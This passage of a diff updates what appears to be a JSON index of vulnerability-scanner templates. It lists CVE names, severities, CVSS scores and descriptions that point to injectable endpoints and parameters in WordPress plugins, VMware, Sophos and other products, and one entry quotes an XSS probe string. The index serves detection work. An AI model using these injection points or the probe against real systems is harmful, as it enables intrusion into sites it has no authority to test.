{"ID":"CVE-2022-38794","Info":{"Name":"Zaver - Local File Inclusion","Severity":"high","Description":"Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-38794.yaml"}
@ -1774,7 +1775,7 @@
{"ID":"CVE-2022-43170","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking \"Add info block\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43170.yaml"}
{"ID":"CVE-2022-43185","Info":{"Name":"Rukovoditel \u003c= 3.2.1 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-43185.yaml"}
{"ID":"CVE-2022-4320","Info":{"Name":"WordPress Events Calendar \u003c1.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4320.yaml"}
{"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"}
{"ID":"CVE-2022-4321","Info":{"Name":"PDF Generator for WordPress \u003c 1.1.2 - Cross Site Scripting","Severity":"medium","Description":"The plugin includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4321.yaml"}
{"ID":"CVE-2022-4325","Info":{"Name":"WordPress Post Status Notifier Lite \u003c1.10.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Status Notifier Lite plugin before 1.10.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4325.yaml"}
{"ID":"CVE-2022-4328","Info":{"Name":"WooCommerce Checkout Field Manager \u003c 18.0 - Arbitrary File Upload","Severity":"critical","Description":"The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-4328.yaml"}
{"ID":"CVE-2022-43769","Info":{"Name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","Severity":"high","Description":"Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-43769.yaml"}
@ -1811,11 +1812,12 @@
{"ID":"CVE-2022-48012","Info":{"Name":"OpenCATS 0.9.7 - Cross-Site Scripting","Severity":"medium","Description":"OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings\u0026a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-48012.yaml"}
{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"}
{"ID":"CVE-2022-4897","Info":{"Name":"WordPress BackupBuddy \u003c8.8.3 - Cross Site Scripting","Severity":"medium","Description":"WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-4897.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
{"ID":"CVE-2023-0099","Info":{"Name":"Simple URLs \u003c 115 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0099.yaml"}
{"ID":"CVE-2023-0126","Info":{"Name":"SonicWall SMA1000 LFI","Severity":"high","Description":"Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-0126.yaml"}
{"ID":"CVE-2023-0236","Info":{"Name":"WordPress Tutor LMS \u003c2.0.10 - Cross Site Scripting","Severity":"medium","Description":"WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0236.yaml"}
{"ID":"CVE-2023-0261","Info":{"Name":"WordPress WP TripAdvisor Review Slider \u003c10.8 - Authenticated SQL Injection","Severity":"high","Description":"WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-0261.yaml"}
{"ID":"CVE-2023-0297","Info":{"Name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","Severity":"critical","Description":"Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-0297.yaml"}
{"ID":"CVE-2023-0448","Info":{"Name":"WP Helper Lite \u003c 4.3 - Cross-Site Scripting","Severity":"medium","Description":"The WP Helper Lite WordPress plugin, in versions \u003c 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-0448.yaml"}
{"ID":"CVE-2023-0514","Info":{"Name":"Membership Database \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0514.yaml"}
{"ID":"CVE-2023-0527","Info":{"Name":"Online Security Guards Hiring System - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input \"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-0527.yaml"}
{"ID":"CVE-2023-0552","Info":{"Name":"WordPress Pie Register \u003c3.8.2.3 - Open Redirect","Severity":"medium","Description":"WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and login out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-0552.yaml"}
@ -1833,29 +1835,31 @@
{"ID":"CVE-2023-1434","Info":{"Name":"Odoo - Cross-Site Scripting","Severity":"medium","Description":"Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1434.yaml"}
{"ID":"CVE-2023-1454","Info":{"Name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1454.yaml"}
{"ID":"CVE-2023-1496","Info":{"Name":"Imgproxy \u003c 3.14.0 - Cross-site Scripting (XSS)","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-1496.yaml"}
{"ID":"CVE-2023-1546","Info":{"Name":"MyCryptoCheckout \u003c 2.124 - Cross-Site Scripting","Severity":"medium","Description":"The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-1546.yaml"}
{"ID":"CVE-2023-1671","Info":{"Name":"Sophos Web Appliance - Remote Code Execution","Severity":"critical","Description":"A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1671.yaml"}
{"ID":"CVE-2023-1730","Info":{"Name":"SupportCandy \u003c 3.1.5 - Unauthenticated SQL Injection","Severity":"critical","Description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-1730.yaml"}
{"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"}
{"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"}
{"ID":"CVE-2023-2023","Info":{"Name":"Custom 404 Pro \u003c 3.7.3 - Cross-Site Scripting","Severity":"medium","Description":"Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2023.yaml"}
{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
{"ID":"CVE-2023-20864","Info":{"Name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","Severity":"critical","Description":"VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20864.yaml"}
{"ID":"CVE-2023-20887","Info":{"Name":"VMware VRealize Network Insight - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20887.yaml"}
{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"}
{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"}
{"ID":"CVE-2023-20888","Info":{"Name":"VMware Aria Operations for Networks - Remote Code Execution","Severity":"high","Description":"Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-20888.yaml"}
{"ID":"CVE-2023-20889","Info":{"Name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","Severity":"high","Description":"Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-20889.yaml"}
{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
{"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"}
{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"}
{"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"}
{"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"}
{"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"}
{"ID":"CVE-2023-22897","Info":{"Name":"Securepoint UTM - Leaking Remote Memory Contents","Severity":"medium","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-22897.yaml"}
{"ID":"CVE-2023-23333","Info":{"Name":"SolarView Compact 6.00 - OS Command Injection","Severity":"critical","Description":"SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23333.yaml"}
{"ID":"CVE-2023-23488","Info":{"Name":"WordPress Paid Memberships Pro \u003c2.9.8 - Blind SQL Injection","Severity":"critical","Description":"WordPress Paid Memberships Pro plugin before 2.9.8 contains a blind SQL injection vulnerability in the 'code' parameter of the /pmpro/v1/order REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23488.yaml"}
{"ID":"CVE-2023-23489","Info":{"Name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","Severity":"critical","Description":"WordPress Easy Digital Downloads plugin 3.1.0.2 and 3.1.0.3 contains a SQL injection vulnerability in the s parameter of its edd_download_search action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-23489.yaml"}
{"ID":"CVE-2023-23491","Info":{"Name":"Quick Event Manager \u003c 9.7.5 - Cross-Site Scripting","Severity":"medium","Description":"The Quick Event Manager WordPress Plugin, version \u003c 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-23491.yaml"}
{"ID":"CVE-2023-23492","Info":{"Name":"Login with Phone Number - Cross-Site Scripting","Severity":"high","Description":"Login with Phone Number, versions \u003c 1.4.2, is affected by an reflected XSS vulnerability in the login-with-phonenumber.php' file in the 'lwp_forgot_password()' function.\n\nNote that CVE-2023-23492 incorrectly describes and scores this as SQL injection vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-23492.yaml"}
{"ID":"CVE-2023-2356","Info":{"Name":"Mlflow \u003c2.3.0 - Local File Inclusion","Severity":"high","Description":"Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"}
{"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"}
{"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian \u003c=18.0.49 - Open Redirect","Severity":"medium","Description":"Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is \"the ability to use arbitrary domain names to access the panel is an intended feature.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24044.yaml"}
{"ID":"CVE-2023-24243","Info":{"Name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","Severity":"high","Description":"CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-24243.yaml"}
{"ID":"CVE-2023-24243","Info":{"Name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","Severity":"high","Description":"CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-24243.yaml"}
{"ID":"CVE-2023-24278","Info":{"Name":"Squidex \u003c7.4.0 - Cross-Site Scripting","Severity":"medium","Description":"Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24278.yaml"}
{"ID":"CVE-2023-24322","Info":{"Name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24322.yaml"}
{"ID":"CVE-2023-24367","Info":{"Name":"Temenos T24 R20 - Cross-Site Scripting","Severity":"medium","Description":"Temenos T24 release 20 contains a reflected cross-site scripting vulnerability via the routineName parameter at genrequest.jsp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24367.yaml"}
@ -1864,71 +1868,74 @@
{"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"}
{"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
